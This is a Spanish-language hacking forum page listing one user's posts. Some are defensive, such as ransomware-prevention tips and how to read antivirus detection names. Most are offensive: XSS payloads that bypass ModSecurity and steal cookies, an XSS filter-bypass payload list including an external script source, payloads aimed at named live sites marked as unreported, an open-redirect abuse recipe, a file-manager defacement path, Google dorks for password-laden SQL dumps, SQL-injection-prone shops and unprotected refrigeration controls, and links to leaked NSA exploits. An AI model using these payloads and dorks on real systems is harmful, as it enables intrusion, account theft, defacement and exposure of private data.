Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Drok3r

#1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De acuerdo a las cifras ofrecidas por KasperskyLab, el aumento de nuevas amenazas de ransomware se ha intensificado casi al doble.

7,620 - 2018 - Amenazas de Ransomware
16,017 - 2019 Amenazas de Ransomware

Al igual, que los números de usuarios infectados (victimas) del ransomware.

158.921 usuarios afectados 2018
230.000 usuarios afectados 2019

Lo cual siguiere que para el próximo año 2020, el numero de amenazas aumentara, esto incluye nuevas técnicas de infección y métodos de distribución. Sin embargo, muchos de estos casos de infección de ransomware a día de hoy, pudieron haber sido evitados, si se siguiera una serie de medidas de seguridad, algunas mas viejas que la misma amenaza.



13 tips para evitar la infección de Ransomware

1.- Realizar periódicamente Backups de tu información. Se recomienda tener copias de nuestra información en medios como la nube, otro en físico, como memorias USB y discos duros portátiles.

2.- Mantener el Sistema Operativo actualizado hasta la ultima versión.

3.- Contar con software antivirus que tenga funciones anti-ransomware

4.- Aumentar la seguridad de tus dispositivos moviles como SmartPhones y Tablet. En 2017 Google elimino mas de 700,000 aplicaciones maliciosas de la PlayStore.

5.- De ser posible implementar extensiones anti-malware a los navegadores.

6.- Mantener actualizado los antivirus.

7.- Establecer filtros de seguridad en los e-mail, corporativos o no.

8.- No descargar archivos de ningún tipo de fuentes poco confiables o no oficiales.

9.- Contar con un repertorio de herramientas anti-ransomware. Esto debido a que existen herramientas especificas para un tipo de ransomware.

10.- Prepara un plan de respuesta y de ser necesario capacita a tus empleados o usuarios de la red, como a tu familia.

11.- Ejecuta análisis periódicos en busca de amenazas en tus equipos

12.- No pagar el rescate. En muchos casos, usuarios han pagado el rescate y no recuperaron ni su información ni sus equipos.

13.- Usar el sentido común y no dar clic en todo lo que veamos.

En caso de ser infectado by VPNMentor

1.- Minimiza el Daño
En primer lugar tienes que aislar el sistema que se ha visto afectado, especialmente si está conectado a la red, para evitar que se infecten otros sistemas. Si eres un administrador de la red y tus servidores están infectados, desconecta todos los cables de Ethernet.

2.- Identificar el Ransomware
Existen varios tipos de ransomware, algunos más peligrosos y difíciles de resolver que otros. Puedes utilizar diferentes estrategias para deshacerte de ellos dependiendo del tipo y características del ataque. Los tipos más
comunes entran en una de las siguientes categorías:

  • Scareware o falsos antivirus
  • Ransomware de bloqueo de pantalla
  • Ransomware que cifra archivos

    3.- Decidir que estrategia tomar
    Hemos mostrado antes los métodos para eliminar los dos primeros tipos de ransomware con relativa facilidad.

    Los programas que cifran archivos son más difíciles de eliminar. En primer lugar tendrás que identificar el tipo de malware en cuestión. La información de los programas más recientes puede ser escasa, ya que cada día se escribe malware nuevo, pero en la mayoría de los casos deberías poder identificarlo investigando un poco.

    Intenta sacar capturas de pantalla de la nota de rescate y luego busca las imágenes mediante una búsqueda inversa para identificar el tipo exacto de ransomware. También puedes buscar las frases que aparecen en el texto del mensaje.

    Decide si quieres pagar el rescate o no. Aunque no se recomienda pagar a los atacantes ya que ello fomenta que continúen su actividad, a veces tu información es demasiado importante como para perderla. Usa tu juicio y no pagues a menos que sea absolutamente necesario. En el peor de los casos tienes que tener en cuenta que no existe garantía de que te devolverán los datos aunque pagues.

    4.- Momento de realizar la estrategia
    Si puedes identificar detalles del ransomware que infectó tu equipo, busca en Internet formas de eliminarlo. El código del malware siempre es ineficiente. El desarrollador puede haberse olvidado de borrar la clave de cifrado del programa que la recupera y descifra los archivos.

    Si el ransomware es bastante conocido y tiene lagunas, deberías poder encontrar tutoriales y guías sobre cómo eliminarlo en webs como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

    Debido a que muchos programas ransomware simplemente eliminan los archivos originales tras cifrar las copias del atacante, puede ser posible recuperarlos utilizando software de recuperación de datos. Cuando borras un archivo, este no se borra físicamente del disco a menos que sea sobrescrito por otro. Por consiguiente, debería ser posible recuperar los datos importantes utilizando software gratuito de recuperación de datos.

    Si ninguno de estos programas tiene éxito, hay que tomar una decisión: paga el rescate o pierde tus datos. Por supuesto, aunque pagues, no está garantizado que los recuperes. Se trata de una cuestión de juicio ya que depende de la buena fe de los atacantes. También puedes intentar negociar con los atacantes utilizando la dirección email que se muestra en la nota de rescate. Es sorprendente la frecuencia con la que suele funcionar.

    Si decides no pagar el rescate, el siguiente paso es limpiar tu PC, pero perderás tus datos para siempre. Si tienes un backup en un disco externo, NO lo conectes a tu PC antes de formatearlo por completo.

    La mejor manera de eliminar ransomware es formatear tu sistema operativo. Si no quieres hacer algo tan drástico, asegúrate de que el ransomware no infecta el sector de arranque; puedes encontrar información al respecto en Internet. A continuación, actualiza tu antivirus y analiza tu sistema en profundidad. También es buena idea complementar el antivirus con un programa anti malware para tener protección completa, lo cual debería eliminar el ransomware por completo.

    5.- Identificar como ocurrió la infección
    Ahora que ya te has deshecho de tu ransomware es el momento de averiguar por qué te atacaron. Como dijo un hombre sabio una vez: «más vale prevenir que curar» – y eso es más importante en cuanto a la seguridad en Internet que a cualquier otra cosa. Una defensa sólo puede ser tan fuerte como lo es el usuario, y con la debida protección implementada es difícil para cualquier malware poder atacarte.
#2
  • Sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (gobierno de Italia)
  • Vulnerabilidad: SQL INJECTION
  • Reportado: SI
  • URL:

#3
Bugs y Exploits / ByPass XSS ModSecurity
Septiembre 23, 2018, 04:10:30 AM
ByPass XSS ModSecurity
[/b]

Como todos sabemos y conocemos muy bien ModSecurity es un WAF, un FireWall de apliaciones web, que ejecuta el módulo del servidor web Apache. Dentro de sus funciones es proteger contra diversos ataques, monitorizar el trafico HTTP y tambien hacer analisis en tiempo real.

ModSecurity ha evitado que lograra explotar la vulnerabilidad XSS (Cross Site Scripting) en algunas apliaciones web, que he testeado, hasta que un dia logre "Bypasear" o burlar el filtro XSS de ModSecuirty.

Utilizando estos dos payloads de XSS logre burlar el filtro y ejecutar mi codigo JS para explotar el XSS

Código: php
---[ByPass Mod_Security]---
'><img src=x onError=prompt("Drok3r")>
'><img+sRc=l+oNerrOr=prompt(document.cookie)+x>


Con las pocas pruebas que hice, tengo como resultado (en mi mala logica) que ModSecurity filtra <script></script> y alert (No importa como intentes camuflajear las etiquetas <script> o alert el ModSecuirty las detecta)

PoC:
#4
Hola a todos...!!!

Les comparto esta lista de strings de SQL para realizar pruebas, contra una apliacion web, que tenga un login, para verificar si este es vulnerable a BYPASS LOGIN.



Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
  • URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • REPORTADO: NO

    Se puede descargar cualquier archivo con formato:
    {
      case "pdf": $ctype="application/pdf"; break;
      case "exe": $ctype="application/octet-stream"; break;
      case "zip": $ctype="application/zip"; break;
      case "doc": $ctype="application/msword"; break;
      case "xls": $ctype="application/vnd.ms-excel"; break;
      case "csv": $ctype="application/vnd.ms-excel"; break;
      case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
      case "gif": $ctype="image/gif"; break;
      case "png": $ctype="image/png"; break;
      case "jpeg":
      case "jpg": $ctype="image/jpg"; break;
      default: $ctype="application/force-download";
    }

#6


  • URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Vector: search
  • Payload: x'"><script>alert(/Drok3r/)</script>
  • Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
  • Reportado: NO
#7
    Captura de pantalla


    Url del sitio
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:
    ----> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Autor
    [!] Drok3r (redbirdTEAM - CiberSecurityRECON)

        Reportado: SI
#8
Algunos sitios que trabajan bajo el CMS de Wordpress, utilizan un plugin llamado wp-js-external-link-info y aunque actualmente ha sido cerrado, algunos sitios aun lo tienen, y nos podemos aprovechar de este plugin para redirigir a una víctima de un sitio a otro.

Para poder hacer esto, utilizaremos el siguiente dork:

inurl:/wp-content/plugins/wp-js-external-link-info/redirect.php?url=

El cual a grandes rasgos realiza una búsqueda de sitios, los cuales tengan en su URL el contenido indicado, en este caso el plugin wp-js-external-link-info.
De acuerdo a google tenemos alrededor de unos 137000 resultados que coinciden con nuestra búsqueda.

Lo importante es la URL, que en este caso es:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

después del parámetro url debemos ingresar el link del sitio al que nosotros queramos redirigir a la víctima. por ejemplo

No tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta[/font][/b]

Y en cuestión de segundos, la victima sera redirigida a otro sitio.

PoC
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Mas informacion de plugin wp js external link info:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Vulnerabilidad en el CMNiceSolution FileManager permite a los atacantes realizar defacement


       
  • Dork: Powered by CMNiceSolution
  • Vendor: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Exploit: target/admin/filemanager
  • Ejemplos:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[.]com/admin/filemanager/



#10
 Cuando se realizan pruebas de seguridad y penetracion a paginas web o aplicaciones web, lo primero que se recomiendo hacer es analizar el codigo HTML. Esto se debe a que podemos encontrar informacion muy interesante (jugosa) que nos puede ayudar a encontrar fallos, comprender el como esta desarrollada la aplicacion o pagina web, sin embargo tambien tenemos algo muy curisos, los comentarios de los desarrolladores que pueden dejar olvidados.

Cada que tengamos una aplicacion web, o pagina web, de las primeras cosas que debemos hacer es inspeccionar el codigo HTML, pero ¿Para que?

Cuando inspeccionamos el codigo HTML podemos encontrar informacion como:

    Archivos
    Comentarios del desarrollador
    URL interesantes

Por ejemplo, si analizamos el codigo HTML de una pagina web, linea por linea (puede ser tardado o aburrido) nos encontramos con lo siguiente:



Tenemos un pequeño codigo PHP, cuando una aplicacion web necesita conectarse con una base de datos MySQL requiere de un conjunto de parametros para poder establecer la conexion como lo son el nombre del host, el nombre de la base de datos el usuario y contraseña. En el caso de nuestro codigo, tenemos un archivo que realiza una llamada
mysql_connect / mysql_pconnect que incluye las credenciales de conexión MySQL.

Lo que puede ser interesante, es el archivo "bokajnr.inc", lo que podemos hacer es lo siguiente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y veamos que pasa.



Podemos descargalo o abrirlo, en mi caso lo abri con Sublime Text un editor de textos muy bueno (lo recomiendo).



Pero que sorpresa... no?

Analizar el codigo HTML, es un punto clave e importante al momento de realizar pruebas de seguridad o penetracion, puede que encontremos algo que un desarrollador dejara olvidado como lo pueden ser notas al momento de desarrollar la pagina o aplicacion web, direcciones a archivos, incluso podemos dar con el Index.



Sitio vulnerable: @indoushka
Post: @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
Esta es una lista pequeña de algunos Dorks, los cuales pueden comprometer la informacion sensible de alguna aplicacion web o servidor.

Este dork le permite encontrar el archivo específico que contiene el nombre de usuario, Contraseña, claves secretas y le permite buscar el archivo de configuración de sql

Dork: filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES



Dork que expone infomacion de envio de formularios, datos de transacciones PII y la divulgación de versiones de plugins y estructuras de directorios. #RedBird #Dork #WordPress

Dork: inurl:/gravity_forms/logs ext:txt



Dork para que se aprovecha de proberv.php para obtener informacion sensible #RedBirdTeam #RedBird #GoogleHacking #Dorking

Dork: intitle:"Proberv0." | inurl:/proberv.php



Dork para identificar sitios que ejecutan el minador de cifrado CoinHive #RedBird #GoogleHacking

Dork: "var miner = new CoinHive" intext:document.domain



Acceso a sistemas de Refrigeracion no protegidos #Dorking #GoogleHacking By. Rootkit_Pentester Curioso dork, con el cual podemos tener acceso a sistemas de refrigeracion no protegidos... podemos llevar esto un poco mas lejos con shodan?

Dork: inurl:/cgi-bin/cgi.cgi?Cont=

#12
XSS Radar es una extensión para Chrome, la cual tiene la función de ser rápida y fácil para XSS fuzzing. Sin embargo

XSS-Radar, solo puede detectar XSS Reflejado y no XSS basado en DOM, XSS almacenado y Self-XSS. Por otra parte la extensión solo esta disponible para Chrome, de acuerdo al desarrollador en un futuro XSS-Radar podrá integrarse a FireFox.

Contextos y pruebas
Con XSS-Radar se desarrollaron contextos, y sus respectivas pruebas, de forma totalmente modular. Al hacerlo, hemos facilitado la contribución de nuevas metodologías al módulo de escáneres de Radar.

Los contextos se encuentran en contexts.js (inside extension/src/payloads/ ). Tras el borrado, el escáner busca los contextos aplicables en el destino y despliega las cargas útiles correctas. Por ejemplo, los errores XSS basados ​​en enlaces a menudo se basan en la inyección dentro del atributo href , por lo que hemos agregado un contexto que específicamente coincide con estos:




Código: javascript
{
    'type': 'a', // link/anchor type
    'matches': ['href'], // URI attribute
    'file': 'link.js' // payload file
}



Las pruebas se encuentran dentro del subdirectorio del playground . XSS Playground contiene una variedad de escenarios de scripts entre sitios diseñados para respaldar el desarrollo y garantizar la efectividad de Radar. En la actualidad, probamos vectores clásicos, inyección de JavaScript, desgloses de etiquetas y vulnerabilidades de plantillas.

Para instalarlo:

    Primero, git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    Visita No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    Habilitar el modo de desarrollador a través de la casilla de verificación
    Seleccione "Cargar extensión no empaquetada"
    Finalmente, busque y seleccione la carpeta de extension interna

Payloads
XSS-Radar, cuenta con unos payloads por defecto, sin embargo el usuario puede agregar los suyos

    Inyección de plantilla AngularJS
        Se admiten todas las versiones con un Expression Sandbox vulnerable
    URIs basados ​​en enlaces
    Inyecciones de guiones
    Cadenas de etiquetas genéricas

Para agregar nuevos o más Payloads, iremos a la direccion extension/src/payloads dentro de nuestra carpeta de XSS-Radar. Una vez en este sitio tendremos 5 archivos .js en donde agregaremos nuestros payloads.

Te dejo este PastBin donde podras encontrar mas Payloads XSS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Instalación y Pruebas de vulnerabilidades (Entorno controlado/Entorno real)
En la parte superior se muestra como, se instala XSS-RADAR, en 5 simples pasos, y su funcionamiento es muy simple.



Ya una vez, con el repositorio clonado, nos vamos a chrome, en las extensiones( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ).





Seleccionamos XSS-Radar y reiniciamos el Chrome (no en todos los casos se reinicia, sin embargo yo lo hice porque no me carga los payload). Y listo, tendremos a nuestro XSS-Radar listo, solo es cuestión de hacer pruebas.





Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Desarrollo de Android SQLite y MySql

Hola, espero me puedan ayudar con un problema que tengo, en cuanto el desarrollo de una App.

Tengo una aplicacion la cual guarda dato en local, en SQLite. Lo que ahora debo de hacer es poder medio de un boton, migrar, pasar, copiar o como gusten llamarle, los datos que contiene una tabla en SQLite a otra tabla en MySQL de forma remota.

La aplicacion guarda unos datos en local. Una vez tengamos los datos guardados en local, debemos de enviarlos a una base de datos remota.

Mi cuestion es, como pasar el contenido de SQLite a MySql en Android.

Gracias
#14
Bugs y Exploits / NSA Tools Kit Remote Explotation
Marzo 04, 2018, 10:12:29 PM
NSA Tools Kit Remote Explotation
#RedBird #NSA #ToolsKit

Oficial Repositorio:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> NSA finest tool
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> fuzzbunch
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> NSA networked status
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> NSA Password cracking
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> ShadowBrokers
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> NSA backdoor
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> EternalBlue
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> EternalBlue scanner
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> Explotis
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> MS17-010
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

--> NSA's IIS 6.0 exploit
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#15


Gran parte del tiempo cuando realizamos una búsqueda de virus o analizamos el sistema con el antivirus, nos encontramos con una detección de un virus o malware en general y no entendemos el resultado. Cuando se detecta un virus no sabemos qué clase de virus es, cuál es su daño dentro del pc, o si solo es una falsa alarma.
Con esta información sabrás a qué clase de virus o malware te enfrentas, el daño que este ha hecho en tu pc y lo que has perdido. (Ya te tomaron fotos desnudo)

Pero antes de poder interpretar, los resultados tenemos que comprender lo siguiente. Nos basaremos en un orden, el cual usan la mayoría de los Antivirus. Plataforma, Tipo, Nombre/familia y Variante.

1.- Plataforma.
La plataforma especifica el sistema operativo, arquitectura del virus y en algunas ocasiones especifica el lenguaje de programación en el que fue diseñado. Pero también la plataforma puede ser genérica, es decir sin una plataforma especifica.
Ejemplo:
– PHP
– Win32
– Win64
– Script
– Java

2.- Tipo.
El tipo es un elemento que indica el tipo de virus con el cual estamos infectados basándose en la actividad de dicho virus.
Ejemplo:
– Trojan
– Dropper
– Worm
– Spy
– Virus

3.- Nombre/familia
Evidentemente este elemento como su nombre lo indica, especifica el nombre del virus, o identifica la familia a la que dicho virus pertenece. Esto también dependerá del antivirus.
Ejemplo:
– Inf
– Q
– GT
– F
– gen

4.- Variante
Muchos virus o malware evolucionan, ya sea porque el creador incrementa sus funcionalidades o cuando el malware cambia partes de su código para evadir la detección o simplemente para aumentar o escalar los privilegios. Esta dependerá de la base de datos del antivirus.
Ejemplo:
– [SupS]
– [Tg]
– [Heur]
– [Adw]
– [Trj]

Ahora tomaremos por ejemplo el resultado de una detección de Avast.
Deteccion de virus en Avast



En la parte que dice "Infección" podemos visualizar la información del virus.
Win32:Dropper-gen[DRP]
Con esa información y retomando lo anteriormente mencionado tenemos lo siguiente:
Plataforma = Win32
Tipo = Dropper
Nombre/Familia = gen
Variante = DRP

Al saber que la plataforma es Win32 sabemos que es un virus que está diseñado para infectar a los sistemas Windows de 32bits. El virus es un dropper el cual cumple la función de conectarse a Internet y descargar software o complementos del mismo, por lo general es usado en troyanos para instalar keylogger o backdoors.
Con esta información sabemos que nos enfrentamos a un malware que descarga software que puede ser perjudicial, en la mayoría de los casos es software para publicidad.

Y con este método o información tendremos el conocimiento de a que virus nos estamos enfrentando o que virus ya nos infectó. Esto también es útil cuando uno hace analizáis en VirusTotal u otros servicios de análisis en línea, con la información sabremos si es un malware o una falsa alarma.

Como dato extra comparto el siguiente link de PandaSecurity, el cual contiene un glosario con definiciones técnicas relacionadas a los malware y antivirus para una mejor interpretación y más conocimiento.

PandaSecurityGlosario -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente(BLOG) -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#16
Presentaciones y cumpleaños / Hola, me presento... :3
Febrero 24, 2018, 10:08:59 PM
Hola, soy un loco de la seguridad informatica y el buen café :3

Soy Fundador de RedBird - Seguridad Ofensiva, una pequeña organizacion que esta creciendo poco a poco, tratando temas relacionados a la seguridad web, proteccion de datos e informationGathering.

Soy miembro de estas organizaciones o empresas:

Hacking Publico & Sistemas Informaticos
DAIT -Seguridad Informatica
Instituto de Ciberseguridad
ONASSOL - Organizacion Nacional de Seguridad Y Software Libre

Soy el escritor de 3 libros..

Hola Mundo

Doxing - Tu identidad jamas sera anonima
Doxing - Burlandonos de la privacodad de Fac3book
Doxing - UserName (PROXIMAMENTE)

Soy fundador de un pequeño team llamado RedBirdTeam
#17
Bugs y Exploits / Roxy Filemnager ckeditor Upload Shell
Febrero 23, 2018, 01:40:53 AM
Roxy Filemnager ckeditor Upload Shell



#18
Payloads XSS Filter Bypass List



Código: text
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">


Link PasteBin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una coleccion de más de 4000 dorks para SQL INJECTION y XSS entre otros. Esta recopilzacion fue realizada gracias al equipo de RedBirdTeam y TeamWhoiam.

Código: text
specials.cfm?id=
store_listing.cfm?id=
store.cfm?id=
store_bycat.cfm?id=
storefront.cfm?id=
Store_ViewProducts.cfm?Cat=
store-details.cfm?id=
StoreRedirect.cfm?ID=
storefronts.cfm?title=
storeitem.cfm?item=
subcategories.cfm?id=
tuangou.cfm?bookid=

tek9.cfm?
template.cfm?Action=Item&pid=
topic.cfm?ID=
type.cfm?iType=
view_cart.cfm?title=

updatebasket.cfm?bookid=
updates.cfm?ID=
view.cfm?cid=
view_detail.cfm?ID=
viewitem.cfm?recor=

viewcart.cfm?CartId=
viewCart.cfm?userID=
viewCat_h.cfm?idCategory=
viewevent.cfm?EventID=
WsAncillary.cfm?ID=

viewPrd.cfm?idcategory=
ViewProduct.cfm?misc=
voteList.cfm?item_ID=
whatsnew.cfm?idCategory=
WsPages.cfm?ID=HP
inurl:".php?cid="+intext:"online+betting"

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"/store/"

inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?cid=" intext:"Buy Now"

inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cat="

inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat=" intext:"/store/"


Link En PasteBin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de Descagra .txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#20
 
Se filtran exploit de la NSA capaz de comprometer, todas las versiones de Windows
[/b]

En el año pasado el grupo de hackers TheShadowBrokers filtraron 3 exploits de la NSA conocidos como EternalRomance, EternalSynergy y EternalChampion, los cuales ahora afectan todas las versiones de Windows partiendo de Windows 2000 en sus variantes de 32 y 64 bits.

El investigador de seguridad Sean Dillon de RiskSense, trabajo con el codigo fuente de estos exploit, para poder comprometer todas las versiones de Windows, con fines educativos y para el desarrollo de nuevas tecnicas de defensa..Sean Dillon utilizo las vulnerabilidades No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, utilizando estas vulnerabilidades y tratando el codigo logro hacerlos funcionar con Metasploit.

EXPLOITS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#21
#22
Google Dorks SQL Injection & XSS Payload

En este post, les comparto una recopilación de más de 100 dorks, para encontrar paginas vulnerables ya sea a SQL INJECTION ó XSS. En cuanto a dar con las vulnerabilidades XSS de igual manera comparto, una lista, la cual es un recopilatorio de más de 100 payloads, que podemos utilizar para dar con sitios vulnerables a XSS.

Google Dorks - SQL INJECTION
Puedes utilizar los GoogleDorks con el fin de encontrar paginas vulnerables a SQL INJECTION.



Pastebin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

XSS Payloads
Esta lista de payloads, nos puede ayudar a encontrar paginas vulnerables a XSS, donde podremos hacer mas que un simple alert, en javascript. Podemos usar herramientas de fuerza fruta, que nos ayuden a encontrar dicha vulnerabilidad en una pagina web.

Puedes usar la herramienta BruteXSS, la cual te permite encontrar vulnerabilidades XSS por medio de fuerza bruta a una aplicacion web.



Pastebin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga BruteXSS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta